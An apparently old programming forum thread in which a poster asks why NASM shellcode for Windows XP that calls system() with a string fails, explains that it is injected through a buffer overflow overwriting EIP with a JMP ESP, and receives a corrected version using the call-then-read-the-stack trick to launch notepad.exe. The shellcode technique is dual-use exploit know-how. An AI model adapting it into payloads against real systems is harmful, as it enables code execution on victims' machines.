I would like to know what is wrong with this code:

[BITS 32] ; Windows XP SP2 32-bit

section .text

global _main

  _main:
     push Command
     mov eax, 0xAABBCCDD ; address of system()
     call eax

  Command:
     db "echo whatever"

As you elude to WinXP, I'll assume you are doing a windows application and as such you must include kernel32.lib and call one of the text emitting functions DrawText, TextOut or ExTextOut. For example DrawText requires 5 parameters as follows

1. Your programs window device context
2. Long pointer to string (in your case Command)
3. Length of string
4. Pointer to bounding rectangle (see Rect Structure)
5. Flags, how you want the text to be displayed within defined rectangle.

No...

This is for Windows shellcode. This will be injected into another application that has already included everything. I already made shellcode that just calls MessageBox(0,0,0,0) and it works.

So are you basically telling me that I need to push a long pointer of a string onto the stack and use that as the argument?

Also, I'm not doing this for a purpose other than for work.

You've got the idea. The only thing your application has to do is get the Device Context of the window you want the text to appear on and then dependant upon the API function you want to use, push the appropriate parameters on the stack and call the function.

Like the example I gave you in the previous message, DrawText requires 5 parameters.

Post the code your going to use in its entirety and I should be able to help you further from there

No, that IS the entire piece of code I'm using...just substitute 0xAABBCCDD for the actual address of system(). You said "push the appropriate parameters" - that's what I'm asking. How do I do that when the parameter is a string? Push only pushes 4 bytes....

Elaborate specifically what string you want to send to which application and then I might get a better understanding what you mean by shell code.

Ha? Shellcode is executed by overflowing a buffer and overwriting the EIP with a JMP %ESP instruction. It then jumps to the ESP and executes the shellcode.

But this is all irrelevant. All I want to know is how I accomplish calling that function by passing a string off as the parameter.

I would like to know what is wrong with this code:

[BITS 32] ; Windows XP SP2 32-bit

section .text

global _main

  _main:
     push Command
     mov eax, 0xAABBCCDD ; address of system()
     call eax

  Command:
     db "echo whatever"

The "echo" command is implemented by "CMD.EXE" [ "COMMAND.EXE" on Win95/98 ] so you will have to launch "CMD.EXE" by starting another process. You can use either ShellExecute or CreateProcess to do this. You will want to change your string to "cmd.exe echo whatever" or you could also use "start cmd.exe echo whatever". Here is Microsoft documentation:

ShellExecute
http://msdn2.microsoft.com/en-us/library/ms647732.aspx

CreateProcess
http://msdn2.microsoft.com/en-US/library/ms682425.aspx

Nathan.

As you elude to WinXP, I'll assume you are doing a windows application and as such you must include kernel32.lib and call one of the text emitting functions DrawText, TextOut or ExTextOut. For example DrawText requires 5 parameters as follows

1. Your programs window device context
2. Long pointer to string (in your case Command)
3. Length of string
4. Pointer to bounding rectangle (see Rect Structure)
5. Flags, how you want the text to be displayed within defined rectangle.

That's the procedure for displaying "text" in a window. Heck, it is even simpler than that -- just call MessageBox. Sadly, this was not the original poster's question.

Nathan.

Alright, alright, alright... I contacted a friend of mine who was actually able to answer my question. This is what he said:

You almost have it:

section .text
global _main

_main:
; save the "return address" to the stack
; ake the address after the call
call GetCommand
db "notepad.exe"
db 0

GetCommand:
; the command address is now the top thing on the stack
mov eax, 0xAABBCCDD ; address of system()
call eax

The difference was your method was pushing the relative offset to the
string, where my version was pushing the actual address of the string.
Glad I could help.

This article has been dead for over six months. Start a new discussion instead.